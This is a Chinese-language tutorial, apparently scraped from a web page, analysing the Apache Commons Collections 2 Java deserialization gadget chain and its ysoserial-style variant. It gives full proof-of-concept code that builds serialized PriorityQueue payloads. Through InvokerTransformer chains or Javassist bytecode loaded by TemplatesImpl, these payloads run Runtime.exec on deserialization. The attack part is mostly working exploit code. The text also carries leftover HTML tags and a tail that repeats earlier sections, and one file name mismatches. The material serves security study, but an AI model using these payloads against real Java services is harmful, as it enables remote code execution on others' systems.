Java安全 - CC2链分析（进阶篇）<\/h1>

前言<\/h2>
本教程详细分析Commons Collections 2（CC2）链及其变种YSO-CC2的利用方式，相比CC1链难度更高，需要掌握更多前置知识。<\/p>

前置知识<\/h2>

ClassLoader<\/h3>
ClassLoader<\/code>是Java类加载器，其中的defineClass<\/code>方法可以将字节码还原为Class对象。<\/p>
关键方法：<\/p>

defineClass(String name, byte[] b, int off, int len)<\/code>：将字节数组转换为Class对象<\/li>
<\/ul>
示例代码：<\/p>
ClassPool pool2 =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>CtClass ct =<\/span> pool2.<\/span>makeClass<\/span>(<\/span>"target.com.prophet.People2"<\/span>);<\/span>
<\/span><\/span>CtConstructor cons =<\/span> ct.<\/span>makeClassInitializer<\/span>();<\/span>
<\/span><\/span>cons.<\/span>insertBefore<\/span>(<\/span>"java.lang.Runtime.getRuntime().exec(\"calc\");"<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> bt =<\/span> ct.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>Method define =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> 
<\/span><\/span>    String.<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span>
<\/span><\/span>define.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Class cla =<\/span> (<\/span>Class)<\/span>define.<\/span>invoke<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span>
<\/span><\/span>    "target.com.prophet.People2"<\/span>,<\/span> bt,<\/span> 0<\/span>,<\/span> bt.<\/span>length<\/span>);<\/span>
<\/span><\/span>cla.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>Javassist<\/h3>
Javassist是一个Java字节码操作库，提供源代码级和字节码级API。<\/p>
ClassPool常用方法<\/h4>

getDefault()<\/code>：获取默认类池<\/li>
insertClassPath(String pathname)<\/code>：在搜索路径开头插入目录或JAR<\/li>
get(String classname)<\/code>：读取类文件并返回CtClass对象<\/li>
makeClass(String classname)<\/code>：创建新的public类<\/li>
<\/ul>
CtClass常用方法<\/h4>

setSuperclass(CtClass clazz)<\/code>：设置父类<\/li>
toBytecode()<\/code>：将类转换为字节数组<\/li>
makeClassInitializer()<\/code>：创建类初始化器（静态构造函数）<\/li>
writeFile()<\/code>：将类文件写入磁盘<\/li>
<\/ul>
CtMethods常用方法<\/h4>

insertBefore(String src)<\/code>：在方法开始处插入代码<\/li>
setBody(String src)<\/code>：设置方法体内容<\/li>
addParameter(CtClass type)<\/code>：添加参数<\/li>
<\/ul>
TemplatesImpl<\/h3>
TemplatesImpl<\/code>类可用于动态加载字节码，关键方法：<\/p>

defineTransletClasses()<\/code>：调用defineClass还原字节码<\/li>
getTransletInstance()<\/code>：实例化转换器类<\/li>
newTransformer()<\/code>：创建新转换器<\/li>
getOutputProperties()<\/code>：获取输出属性（上层调用newTransformer）<\/li>
<\/ul>
利用链：<\/p>
getOutputProperties() -> newTransformer() -> getTransletInstance() -> defineTransletClasses() -> defineClass()
<\/code><\/pre>
示例代码：<\/p>
ClassPool pool2 =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>CtClass ct =<\/span> pool2.<\/span>makeClass<\/span>(<\/span>"People2"<\/span>);<\/span>
<\/span><\/span>ct.<\/span>setSuperclass<\/span>(<\/span>pool2.<\/span>get<\/span>(<\/span>AbstractTranslet.<\/span>class<\/span>.<\/span>getName<\/span>()));<\/span>
<\/span><\/span>CtConstructor cons =<\/span> ct.<\/span>makeClassInitializer<\/span>();<\/span>
<\/span><\/span>cons.<\/span>insertBefore<\/span>(<\/span>"java.lang.Runtime.getRuntime().exec(\"calc\");"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>byte<\/span>[]<\/span> bytecode =<\/span> ct.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>byte<\/span>[][]<\/span> bytecodes =<\/span> new<\/span> byte<\/span>[][]{<\/span>bytecode};<\/span>
<\/span><\/span>
<\/span><\/span>TemplatesImpl templates =<\/span> TemplatesImpl.<\/span>class<\/span>.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> bytecodes);<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_class"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "test"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> TransformerFactoryImpl.<\/span>class<\/span>.<\/span>newInstance<\/span>());<\/span>
<\/span><\/span>
<\/span><\/span>templates.<\/span>newTransformer<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>PriorityQueue<\/h3>
优先队列常用方法：<\/p>

add()<\/code>\/offer()<\/code>：添加元素<\/li>
poll()<\/code>\/remove()<\/code>：取出并删除队首元素<\/li>
peek()<\/code>：查询队首元素<\/li>
<\/ul>
比较器用法：<\/p>
\/\/ 默认从小到大
<\/span><\/span><\/span><\/span>PriorityQueue<<\/span>Integer><\/span> queue =<\/span> new<\/span> PriorityQueue<>();<\/span> 
<\/span><\/span>
<\/span><\/span>\/\/ 从大到小
<\/span><\/span><\/span><\/span>PriorityQueue<<\/span>Integer><\/span> queue =<\/span> new<\/span> PriorityQueue<>((<\/span>a,<\/span>b)->(<\/span>b-<\/span>a));<\/span>
<\/span><\/span><\/code><\/pre>环境准备<\/h2>
依赖配置：<\/p>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.apache.commons<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>commons-collections4<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>4.0<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.javassist<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>javassist<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>3.25.0-GA<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>CC2链分析<\/h2>
为什么不用AnnotationInvocationHandler<\/h3>
在Commons Collections 4.0中，AnnotationInvocationHandler<\/code>的readObject<\/code>方法已被修复，因此需要寻找新的入口点。<\/p>
TransformingComparator<\/h3>
TransformingComparator<\/code>类的compare<\/code>方法会执行transform<\/code>操作，且transformer<\/code>成员可通过构造方法设置。<\/p>
调用链：<\/p>
PriorityQueue.readObject() 
-> heapify() 
-> siftDown() 
-> siftDownUsingComparator() 
-> TransformingComparator.compare() 
-> ChainedTransformer.transform()
<\/code><\/pre>
完整利用链：<\/p>
ObjectInputStream.readObject()
-> PriorityQueue.readObject()
-> PriorityQueue.heapify()
-> PriorityQueue.siftDown()
-> PriorityQueue.siftDownUsingComparator()
-> TransformingComparator.compare()
-> ChainedTransformer.transform()
-> ConstantTransformer.transform()
-> InvokerTransformer.transform()
-> Method.invoke()
-> Class.getMethod()
-> InvokerTransformer.transform()
-> Method.invoke()
-> Runtime.getRuntime()
-> InvokerTransformer.transform()
-> Method.invoke()
-> Runtime.exec()
<\/code><\/pre>
POC代码：<\/p>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>TransformingComparator comparator =<\/span> new<\/span> TransformingComparator(<\/span>chainedTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>PriorityQueue queue =<\/span> new<\/span> PriorityQueue(<\/span>comparator);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>new<\/span> Object());<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>new<\/span> Object());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化
<\/span><\/span><\/span><\/span>ObjectOutputStream outputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"cc2.bin"<\/span>));<\/span>
<\/span><\/span>outputStream.<\/span>writeObject<\/span>(<\/span>queue);<\/span>
<\/span><\/span>ObjectInputStream inputStream =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"demo.bin"<\/span>));<\/span>
<\/span><\/span>inputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>YSO-CC2链分析<\/h2>
结合Javassist和TemplatesImpl实现更高级的利用方式。<\/p>
关键点：<\/p>

使用InvokerTransformer<\/code>调用TemplatesImpl<\/code>的getOutputProperties<\/code>方法<\/li>
通过TransformingComparator.compare()<\/code>触发transform<\/code><\/li>
将恶意TemplatesImpl<\/code>对象传入队列<\/li>
<\/ol>
POC代码：<\/p>
\/\/ 创建恶意类
<\/span><\/span><\/span><\/span>ClassPool pool2 =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>CtClass ct =<\/span> pool2.<\/span>makeClass<\/span>(<\/span>"People2"<\/span>);<\/span>
<\/span><\/span>ct.<\/span>setSuperclass<\/span>(<\/span>pool2.<\/span>get<\/span>(<\/span>AbstractTranslet.<\/span>class<\/span>.<\/span>getName<\/span>()));<\/span>
<\/span><\/span>CtConstructor cons =<\/span> ct.<\/span>makeClassInitializer<\/span>();<\/span>
<\/span><\/span>cons.<\/span>insertBefore<\/span>(<\/span>"java.lang.Runtime.getRuntime().exec(\"calc\");"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>byte<\/span>[]<\/span> bytecode =<\/span> ct.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>byte<\/span>[][]<\/span> bytecodes =<\/span> new<\/span> byte<\/span>[][]{<\/span>bytecode};<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置TemplatesImpl
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> TemplatesImpl.<\/span>class<\/span>.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> bytecodes);<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_class"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "test"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> TransformerFactoryImpl.<\/span>class<\/span>.<\/span>newInstance<\/span>());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建InvokerTransformer调用getOutputProperties
<\/span><\/span><\/span><\/span>Constructor<?><\/span> constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>
<\/span><\/span>    "org.apache.commons.collections4.functors.InvokerTransformer"<\/span>)<\/span>
<\/span><\/span>    .<\/span>getDeclaredConstructor<\/span>(<\/span>String.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>InvokerTransformer invokerTransformer =<\/span> (<\/span>InvokerTransformer)<\/span> 
<\/span><\/span>    constructor.<\/span>newInstance<\/span>(<\/span>"getOutputProperties"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置比较器
<\/span><\/span><\/span><\/span>TransformingComparator comparator =<\/span> new<\/span> TransformingComparator(<\/span>invokerTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 配置PriorityQueue
<\/span><\/span><\/span><\/span>PriorityQueue queue =<\/span> new<\/span> PriorityQueue();<\/span>
<\/span><\/span>setFieldValue(<\/span>queue,<\/span> "size"<\/span>,<\/span> 2<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>queue,<\/span> "comparator"<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>Object[]<\/span> list =<\/span> new<\/span> Object[]{<\/span>templates,<\/span> 1<\/span>};<\/span>
<\/span><\/span>setFieldValue(<\/span>queue,<\/span> "queue"<\/span>,<\/span> list);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化
<\/span><\/span><\/span><\/span>ObjectOutputStream outputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"cc2.bin"<\/span>));<\/span>
<\/span><\/span>outputStream.<\/span>writeObject<\/span>(<\/span>queue);<\/span>
<\/span><\/span>ObjectInputStream inputStream =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"cc2.bin"<\/span>));<\/span>
<\/span><\/span>inputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>辅助方法<\/h2>
private<\/span> static<\/span> void<\/span> setFieldValue<\/span>(<\/span>final<\/span> Object obj,<\/span> 
<\/span><\/span>    final<\/span> String fieldName,<\/span> final<\/span> Object value)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span>
<\/span><\/span>    field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    field.<\/span>set<\/span>(<\/span>obj,<\/span> value);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>总结<\/h2>
CC2链相比CC1链：<\/p>

使用了PriorityQueue<\/code>作为入口类<\/li>
通过TransformingComparator<\/code>触发transform<\/code><\/li>
在4.0版本中规避了AnnotationInvocationHandler<\/code>的限制<\/li>
<\/ol>
YSO-CC2链进一步：<\/p>

结合Javassist动态生成恶意类<\/li>
利用TemplatesImpl<\/code>加载字节码<\/li>
通过InvokerTransformer<\/code>直接调用getOutputProperties<\/code>方法<\/li>
<\/ol>
掌握这些技术需要深入理解Java反射、类加载机制和序列化原理。<\/p>
Java安全 - CC2链分析（进阶篇）<\/h1>

前言<\/h2> 本教程详细分析Commons Collections 2（CC2）链及其变种YSO-CC2的利用方式，相比CC1链难度更高，需要掌握更多前置知识。<\/p>

前置知识<\/h2>

Javassist<\/h3> Javassist是一个Java字节码操作库，提供源代码级和字节码级API。<\/p>

CC2链分析<\/h2>

为什么不用AnnotationInvocationHandler<\/h3> 在Commons Collections 4.0中，AnnotationInvocationHandler<\/code>的readObject<\/code>方法已被修复，因此需要寻找新的入口点。<\/p>

前言<\/h2>
本教程详细分析Commons Collections 2（CC2）链及其变种YSO-CC2的利用方式，相比CC1链难度更高，需要掌握更多前置知识。<\/p>

Javassist<\/h3>
Javassist是一个Java字节码操作库，提供源代码级和字节码级API。<\/p>

为什么不用AnnotationInvocationHandler<\/h3>
在Commons Collections 4.0中，`AnnotationInvocationHandler<\/code>的readObject<\/code>方法已被修复，因此需要寻找新的入口点。<\/p>`
